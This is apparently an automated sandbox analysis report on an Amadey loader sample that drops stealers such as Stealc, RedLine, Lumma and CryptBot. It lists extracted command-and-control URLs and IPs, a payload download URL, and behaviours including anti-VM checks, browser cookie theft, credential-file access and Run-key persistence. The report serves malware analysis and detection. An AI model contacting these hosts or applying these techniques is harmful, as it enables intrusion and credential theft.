amadey | c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
18-02-2025 06:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2341120afd619b888c8316c0a91d39b8.exe
Size

2.0MB
MD5

2341120afd619b888c8316c0a91d39b8
SHA1

a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7
SHA256

c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b
SHA512

89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b
SSDEEP

49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

cryptbot

http://home.fivecc5vs.top/RkxPTSBLYxNxxrPaLizI17

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

redline

Botnet

cheat

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

http://ecozessentials.com

Attributes

url_path
/e6cb1c8fc7cd1659.php

Extracted

Family

lumma

https://mercharena.biz/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detects CryptBot payload 1 IoCs

CryptBot is a C++ stealer distributed widely in bundle with other software.

spyware stealer

resource	yara_rule
behavioral2/memory/1764-209-0x0000000069CC0000-0x000000006A71B000-memory.dmp	family_cryptbot_v3

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/2052-1204-0x0000000000D00000-0x0000000001178000-memory.dmp	family_sectoprat
behavioral2/memory/2052-1205-0x0000000000D00000-0x0000000001178000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	c7d681fd29.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2341120afd619b888c8316c0a91d39b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c7d681fd29.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	61996fd75d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0b87b998dd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	12695a2f10.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	73f7781714.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	05a2b4c051.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2e0f8c0da0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	23364180fc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	36ef8d9a36.exe

Blocklisted process makes network request 64 IoCs

flow	pid	Process
64	4404	powershell.exe
237	5904	powershell.exe
243	5904	powershell.exe
257	5904	powershell.exe
260	5904	powershell.exe
281	5904	powershell.exe
286	5904	powershell.exe
289	5904	powershell.exe
292	5904	powershell.exe
295	5904	powershell.exe
296	5904	powershell.exe
300	5904	powershell.exe
303	5904	powershell.exe
310	5904	powershell.exe
312	5904	powershell.exe
313	5904	powershell.exe
314	5904	powershell.exe
315	5904	powershell.exe
316	5904	powershell.exe
317	5904	powershell.exe
318	5904	powershell.exe
319	5904	powershell.exe
320	5904	powershell.exe
321	5904	powershell.exe
322	5904	powershell.exe
323	5904	powershell.exe
324	5904	powershell.exe
325	5904	powershell.exe
333	5904	powershell.exe
334	5904	powershell.exe
340	5904	powershell.exe
344	5904	powershell.exe
351	5904	powershell.exe
352	5904	powershell.exe
354	5904	powershell.exe
356	5904	powershell.exe
360	5904	powershell.exe
362	5904	powershell.exe
366	5904	powershell.exe
369	5904	powershell.exe
371	5904	powershell.exe
373	5904	powershell.exe
374	5904	powershell.exe
375	5904	powershell.exe
376	5904	powershell.exe
377	5904	powershell.exe
379	5904	powershell.exe
380	5904	powershell.exe
381	5904	powershell.exe
382	5904	powershell.exe
383	5904	powershell.exe
384	5904	powershell.exe
385	5904	powershell.exe
386	5904	powershell.exe
387	5904	powershell.exe
390	5904	powershell.exe
391	5904	powershell.exe
394	5904	powershell.exe
395	5904	powershell.exe
396	5904	powershell.exe
397	5904	powershell.exe
398	5904	powershell.exe
399	5904	powershell.exe
400	5904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4404	powershell.exe
3820	powershell.exe
6016	powershell.exe

Downloads MZ/PE file 20 IoCs

flow	pid	Process
197	928	BitLockerToGo.exe
15	2068	futors.exe
64	4404	powershell.exe
3	3292	skotes.exe
3	3292	skotes.exe
3	3292	skotes.exe
3	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
5	3292	skotes.exe
39	4844	BitLockerToGo.exe
41	3080	BitLockerToGo.exe

Uses browser remote debugging 2 TTPs 13 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4204	msedge.exe
5948	msedge.exe
4088	chrome.exe
5744	chrome.exe
5056	chrome.exe
4104	msedge.exe
3200	msedge.exe
5168	msedge.exe
6044	chrome.exe
5036	chrome.exe
4768	chrome.exe
4948	chrome.exe
5724	chrome.exe

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	23364180fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2e0f8c0da0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	73f7781714.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	23364180fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2341120afd619b888c8316c0a91d39b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c7d681fd29.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2e0f8c0da0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0b87b998dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	36ef8d9a36.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0b87b998dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	61996fd75d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	12695a2f10.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	05a2b4c051.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	73f7781714.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	36ef8d9a36.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2341120afd619b888c8316c0a91d39b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	61996fd75d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	05a2b4c051.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c7d681fd29.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	12695a2f10.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d2YQIJa.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	2341120afd619b888c8316c0a91d39b8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	c7d681fd29.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	7aencsM.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe

Executes dropped EXE 36 IoCs

pid	Process
3292	skotes.exe
4928	amnew.exe
2068	futors.exe
3520	skotes.exe
2708	jROrnzx.exe
4468	jROrnzx.exe
3996	futors.exe
3064	qFqSpAp.exe
1764	c7d681fd29.exe
3916	61996fd75d.exe
3204	12695a2f10.exe
768	2e0f8c0da0.exe
4968	73f7781714.exe
3572	d71a31942b.exe
1308	5d20b033cd.exe
1308	Bjkm5hE.exe
1196	Bjkm5hE.exe
6016	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
536	d2YQIJa.exe
5584	DTQCxXZ.exe
468	23364180fc.exe
5260	Ta3ZyUR.exe
3348	Ta3ZyUR.exe
4316	Ta3ZyUR.exe
3280	05a2b4c051.exe
2604	service123.exe
5244	7aencsM.exe
5200	7aencsM.exe
5608	skotes.exe
5056	futors.exe
2752	service123.exe
2052	36ef8d9a36.exe
2952	0b87b998dd.exe
5352	skotes.exe
1532	service123.exe
4844	futors.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	23364180fc.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	36ef8d9a36.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	0b87b998dd.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	2341120afd619b888c8316c0a91d39b8.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	2e0f8c0da0.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	12695a2f10.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	d2YQIJa.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	c7d681fd29.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	61996fd75d.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	73f7781714.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	05a2b4c051.exe

Loads dropped DLL 3 IoCs

pid	Process
2604	service123.exe
2752	service123.exe
1532	service123.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c7d681fd29.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006970101\\c7d681fd29.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12695a2f10.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006980101\\12695a2f10.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2e0f8c0da0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085411001\\2e0f8c0da0.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\73f7781714.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085412001\\73f7781714.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d71a31942b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085413001\\d71a31942b.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5d20b033cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085414001\\5d20b033cd.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023db4-194.dat	autoit_exe
behavioral2/files/0x0007000000023db8-224.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
3288	2341120afd619b888c8316c0a91d39b8.exe
3292	skotes.exe
3520	skotes.exe
1764	c7d681fd29.exe
3916	61996fd75d.exe
3204	12695a2f10.exe
768	2e0f8c0da0.exe
4968	73f7781714.exe
6016	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
536	d2YQIJa.exe
468	23364180fc.exe
3280	05a2b4c051.exe
5608	skotes.exe
2052	36ef8d9a36.exe
2952	0b87b998dd.exe
5352	skotes.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 4468	2708	jROrnzx.exe	88
PID 3916 set thread context of 4844	3916	61996fd75d.exe	103
PID 3204 set thread context of 3080	3204	12695a2f10.exe	104
PID 1308 set thread context of 1196	1308	Bjkm5hE.exe	127
PID 5260 set thread context of 3348	5260	Ta3ZyUR.exe	151
PID 468 set thread context of 928	468	23364180fc.exe	162
PID 5244 set thread context of 5200	5244	7aencsM.exe	166

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	2341120afd619b888c8316c0a91d39b8.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
388	2708	WerFault.exe	86
5344	1308	WerFault.exe	124
4480	5260	WerFault.exe	149
808	1764	WerFault.exe	95
5156	5244	WerFault.exe	163

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jROrnzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	61996fd75d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempSL0HXJPEGQNGXOFNQWZEKYZUGBPYRN6N.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	d71a31942b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	23364180fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2341120afd619b888c8316c0a91d39b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	12695a2f10.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	73f7781714.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5d20b033cd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jROrnzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	d71a31942b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ta3ZyUR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36ef8d9a36.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qFqSpAp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2e0f8c0da0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ta3ZyUR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c7d681fd29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d71a31942b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0b87b998dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	05a2b4c051.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	c7d681fd29.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	c7d681fd29.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5548	timeout.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
1456	taskkill.exe
